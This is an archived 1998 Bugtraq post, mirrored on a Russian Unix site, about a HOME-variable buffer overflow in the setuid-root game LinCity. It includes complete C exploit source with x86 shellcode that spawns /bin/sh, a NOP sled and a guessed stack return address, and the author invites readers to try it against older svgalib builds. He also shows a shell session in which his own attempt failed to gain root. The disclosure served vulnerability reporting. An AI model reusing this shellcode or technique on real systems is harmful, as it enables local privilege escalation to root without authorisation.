The OpenNET Project / Index page
BSD, Linux, Cisco, Web, Palm, other unix
RUSSIAN version

Search
Совет: Как нормализовать цвета и контрастность изображения через Image::Magic
SOFT - Unix Software catalog
LINKS - Unix resources
TOPIC - Articles from usenet
DOCUMENTATION - Unix guides
News | Tips | MAN | Forum | BUGs | LastSoft | Keywords | BOOKS (selected) | Linux HowTo | FAQ Archive

LinCity Buffer Overflow


<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
X-RDate: Tue, 17 Mar 1998 16:42:27 +0500 (ESK)
Date: Mon, 16 Mar 1998 12:34:05 -0500
From: "T. Freak" <tfreak@JADED.NET>
To: BUGTRAQ@NETSPACE.ORG
Subject: LinCity Buffer Overflow

Greetings,

While a buffer overflow is blantenly obvious in the code, I don't think it
is very dangerous.  Observe.

jaded:~> id
uid=1000(tfreak) gid=1000(tfreak)
groups=1000(tfreak),0(root),4(adm),7(lp),24(cdrom),25(floppy),31(majordom),69(geek)
jaded:~> ls -l /usr/games/lincity
-rwsr-xr-x   1 root     root       769384 Mar 14 20:36 /usr/games/lincity
jaded:~> ./x
svgalib: Using S3 driver (Trio64, 2048K).
svgalib: s3: chipsets newer than S3-864 is not supported well yet.
svgalib: RAMDAC: Trio64: MCLK = 50.114 MHz
sh-2.01$ id
uid=1000(tfreak) gid=1000(tfreak)
groups=1000(tfreak),0(root),4(adm),7(lp),24(cdrom),25(floppy),31(majordom),69(geek)
sh-2.01$

despite the setuid permissions, I was unable to obtain a root shell.  I
have included the exploit for you to test yourself, perhaps it will work
on older versions of svgalib.  Let me know how it turns out.

I remain,

tf.

/*
 *  lincity-svga exploit by TFreak
 *
 *  another example of bad programming, copying the HOME environment
 *  without bounds checking to a static size buffer (100 bytes)
 *
 */

#include <stdio.h>

#define bs 250
#define of 300

unsigned long sp (void);

int main(int argc, char *argv[])
{
    char *p, *buf;
    char shell[] =
        "\xeb\x24\x5e\x8d\x1e\x89\x5e\x0b\x33\xd2\x89\x56\x07\x89\x56\x0f"
        "\xb8\x1b\x56\x34\x12\x35\x10\x56\x34\x12\x8d\x4e\x0b\x8b\xd1\xcd"
        "\x80\x33\xc0\x40\xcd\x80\xe8\xd7\xff\xff\xff/bin/sh";
    unsigned long addr, *paddr;
    int i;

    buf = (char *) malloc(bs);
    p = buf;
    paddr = (unsigned long *) p;

    addr = sp() - of;

    for (i = 0; i < bs; i += 4)
        *(paddr++) = addr;

    memset(p, 0x90, bs/2);
    p += bs/2;

    for (i = 0; i < strlen(shell); i++)
        *(p++) = shell[i];

    setenv("HOME", buf, 1);
    execl("/usr/games/lincity", "lincity", NULL);
}

unsigned long sp (void)
{
    __asm__("movl %esp, %eax");
}

<< Previous INDEX Search src Set bookmark Go to bookmark Next >>
Закладки
Добавить в закладки
Created 1996-2003 by Maxim Chirkov  
ДобавитьРекламаВебмастеруЦУПГИД  
SpyLOG TopList